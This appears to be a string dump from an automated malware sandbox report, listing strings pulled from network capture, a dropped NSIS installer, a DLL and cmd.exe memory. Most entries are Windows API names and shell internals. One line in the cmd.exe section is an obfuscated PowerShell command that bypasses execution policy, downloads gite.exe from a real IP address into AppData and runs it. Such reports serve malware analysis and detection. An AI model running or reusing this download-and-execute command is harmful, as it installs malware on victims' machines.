Ansi based on PCAP Processing (PCAP)

46.30.43.107

Ansi based on PCAP Processing (PCAP)

!This program cannot be run in DOS mode.$

Ansi based on Dropped File (Roaming.exE.1622950302)

%ls=%ls

Ansi based on Dropped File (Roaming.exE.1622950302)

%u.%u%s%s

Unicode based on Dropped File (Roaming.exE.1622950302)

*?|<>/":

Unicode based on Dropped File (Roaming.exE.1622950302)

.%u%s%s

Unicode based on Dropped File (Roaming.exE.1622950302)

... %d%%

Unicode based on Dropped File (Roaming.exE.1622950302)

.ndata

Ansi based on Dropped File (Roaming.exE.1622950302)

.rsrc

Ansi based on Dropped File (Roaming.exE.1622950302)

.text

Ansi based on Dropped File (Roaming.exE.1622950302)

@.data

Ansi based on Dropped File (Roaming.exE.1622950302)

[Rename]

Ansi based on Dropped File (Roaming.exE.1622950302)

\Temp

Unicode based on Dropped File (Roaming.exE.1622950302)

`.rdata

Ansi based on Dropped File (Roaming.exE.1622950302)

AdjustTokenPrivileges

Ansi based on Dropped File (Roaming.exE.1622950302)

ADVAPI32

Ansi based on Dropped File (Roaming.exE.1622950302)

Error launching installer

Unicode based on Dropped File (Roaming.exE.1622950302)

Error writing temporary file. Make sure your temp folder is valid.

Unicode based on Dropped File (Roaming.exE.1622950302)

GetUserDefaultUILanguage

Ansi based on Dropped File (Roaming.exE.1622950302)

InitiateShutdownW

Ansi based on Dropped File (Roaming.exE.1622950302)

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error

Unicode based on Dropped File (Roaming.exE.1622950302)

k has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error

Unicode based on Dropped File (Roaming.exE.1622950302)

KERNEL32

Ansi based on Dropped File (Roaming.exE.1622950302)

LookupPrivilegeValueW

Ansi based on Dropped File (Roaming.exE.1622950302)

nInfoSizeW

Ansi based on Dropped File (Roaming.exE.1622950302)

NSIS Error

Unicode based on Dropped File (Roaming.exE.1622950302)

OpenProcessToken

Ansi based on Dropped File (Roaming.exE.1622950302)

s valid.

Unicode based on Dropped File (Roaming.exE.1622950302)

SeShutdownPrivilege

Unicode based on Dropped File (Roaming.exE.1622950302)

SHAutoComplete

Ansi based on Dropped File (Roaming.exE.1622950302)

SHFOLDER

Ansi based on Dropped File (Roaming.exE.1622950302)

SHGetFolderPathW

Ansi based on Dropped File (Roaming.exE.1622950302)

SHLWAPI

Ansi based on Dropped File (Roaming.exE.1622950302)

strcpynW

Ansi based on Dropped File (Roaming.exE.1622950302)

teProcessW

Ansi based on Dropped File (Roaming.exE.1622950302)

verifying installer: %d%%

Unicode based on Dropped File (Roaming.exE.1622950302)

|<>/":

Unicode based on Dropped File (Roaming.exE.1622950302)

~nsu.tmp

Unicode based on Dropped File (Roaming.exE.1622950302)

.reloc

Ansi based on Dropped File (System.dll.469766707)

Alloc

Ansi based on Dropped File (System.dll.469766707)

callback%d

Unicode based on Dropped File (System.dll.469766707)

CLSIDFromString

Ansi based on Dropped File (System.dll.469766707)

error

Unicode based on Dropped File (System.dll.469766707)

GlobalSize

Ansi based on Dropped File (System.dll.469766707)

Int64Op

Ansi based on Dropped File (System.dll.469766707)

Store

Ansi based on Dropped File (System.dll.469766707)

StrAlloc

Ansi based on Dropped File (System.dll.469766707)

StringFromGUID2

Ansi based on Dropped File (System.dll.469766707)

System.dll

Ansi based on Dropped File (System.dll.469766707)

VirtualProtect

Ansi based on Dropped File (System.dll.469766707)

Ansi based on Process Commandline (cmd.exe)

IHDR

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

Corporation

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

Operating System

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

Type: %x

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%02d%s%02d%s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%02d%s%02d%s%02d

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%04X-%04X

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%2d%s%02d%s%02d%s%02d

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%d.%d.%04d

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%s %s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%s %s%s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%s (%s) %s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%s=%s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

%WINDOWS_COPYRIGHT%

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%x %c

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

&()[]{}^=;!%'+,`~

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

(%s) %s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

()|&=,;"

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

)|^&=,

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

*** Unknown type: %x

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

.7601.17514 (win7sp1_rtm.101119-1850)

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

/[] "

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

/D /c"

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

/K %s

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

/MM/yy

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

0 0$0(0,040<0@0H0L0P0

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

00000409

Unicode based on Runtime Data (cmd.exe )

0123456789

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

6.1.7601.17514

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

<>+-*/%()|^&=,

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

=,;+/[] "

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

=ExitCode

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

=ExitCodeAscii

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

?!?7?J?

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

????????.???

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

?terminate@@YAXXZ

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

[...]

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

\CMD.EXE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

\Policies\Microsoft\Windows\System

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

\RPC Control\console-0x00000EE8-lpc-handle

Unicode based on Runtime Data (cmd.exe )

\Sessions\1\Windows\ApiPort

Unicode based on Runtime Data (cmd.exe )

\Shell\Open\Command

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

\XCOPY.EXE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

__getmainargs

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

__p__commode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

__p__fmode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

__set_app_type

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

__setusermatherr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_amsg_exit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_cexit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_close

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_controlfp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_dup2

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_errno

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_except_handler4_common

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_exit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_get_osfhandle

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_getch

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_initterm

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_local_unwind4

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_open_osfhandle

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_pclose

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_pipe

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_setjmp3

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_setmode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_tell

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_ultoa

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_vsnwprintf

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_wcsicmp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_wcslwr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_wcsnicmp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_wcsupr

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_wpopen

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_wtol

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_XcptFilter

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ABOVENORMAL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

ADVAPI32.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

AFFINITY

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

APerformArithmeticOperation: '%c'

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

APerformUnaryOperation: '%c'

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

AppData

Unicode based on Runtime Data (cmd.exe )

Application

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Args: `%s'

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ASSOC

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

AuthenticodeEnabled

Unicode based on Runtime Data (cmd.exe )

AutoRun

Unicode based on Runtime Data (cmd.exe )

BELOWNORMAL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

BrandingFormatString

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%LOCALAPPDATA%\Temp

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

calloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CancelSynchronousIo

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CCCC@40`P@

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

CHDIR

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

chdir

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CloseHandle

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CMD Internal Error %s

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

cmd.exe

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

cmd.pdb

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Cmd: %s Type: %x

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CmdBatNotification

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CMDCMDLINE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CMDEXTVERSION

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

COLOR

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

CompanyName

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

CompareFileTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CompletionChar

Unicode based on Runtime Data (cmd.exe )

COMSPEC

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

COPY.EXE

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

COPYCMD

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CopyFileExW

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CopyFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CreateDirectoryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CreateFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CreateHardLinkW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CreateProcessW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CreateSymbolicLinkW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CWDIllegalInDLLSearch

Unicode based on Runtime Data (cmd.exe )

d%s%02d%s%02d

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

D3blc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

dd/MM/yy

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DefaultColor

Unicode based on Runtime Data (cmd.exe )

DEFINED

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DelayedExpansion

Unicode based on Runtime Data (cmd.exe )

DelayLoadFailureHook

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DeleteFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DeleteProcThreadAttributeList

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

delims=

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DeviceIoControl

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DIRCMD

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DisableCMD

Unicode based on Runtime Data (cmd.exe )

DISABLEDELAYEDEXPANSION

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

DISABLEEXTENSIONS

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

DisableLocalOverride

Unicode based on Runtime Data (cmd.exe )

DisableMetaFiles

Unicode based on Runtime Data (cmd.exe )

DisableUNCCheck

Unicode based on Runtime Data (cmd.exe )

DisableUserModeCallbackFilter

Unicode based on Runtime Data (cmd.exe )

DLOCAL

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

DPATH

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DuplicateHandle

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

en-US

Unicode based on Runtime Data (cmd.exe )

ENABLEDELAYEDEXPANSION

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

ENABLEEXTENSIONS

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

EnableExtensions

Unicode based on Runtime Data (cmd.exe )

EnterCriticalSection

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ERASE

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

ERRORLEVEL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs C:\Users\%USERNAME%\AppData\Roaming.exE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

EXIST

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ExpandEnvironmentStringsW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Extensions

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

faultColor

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

fdpnxsatz

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ferror

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

fflush

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

fgets

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FileTimeToLocalFileTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FileTimeToSystemTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FillConsoleOutputAttribute

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FillConsoleOutputCharacterW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindClose

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindFirstFileExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindFirstFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindFirstStreamW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindNextFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FindNextStreamW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FlushConsoleInputBuffer

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FlushFileBuffers

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FOR /?

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FOR/?

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FormatMessageW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

fprintf

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FreeEnvironmentStringsW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

FreeLibrary

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetACP

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetBinaryTypeW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCommandLineW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetConsoleMode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetConsoleOutputCP

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetConsoleScreenBufferInfo

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetConsoleTitleW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetConsoleWindow

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCPInfo

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCurrentDirectoryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCurrentProcess

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCurrentProcessId

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCurrentThreadId

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetDateFormatW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetDiskFreeSpaceExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetDriveTypeW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetEnvironmentStringsW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetEnvironmentVariableW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetExitCodeProcess

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetFileAttributesExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetFileAttributesW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetFileSize

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetFileType

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetFullPathNameW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetLastError

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetLocaleInfoW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetLocalTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetModuleFileNameW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetModuleHandleA

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetModuleHandleW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetNumaHighestNodeNumber

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetNumaNodeProcessorMaskEx

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GeToken: (%x) '%s'

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetProcAddress

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetProcessHeap

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetStartupInfoW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetStdHandle

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetSystemTime

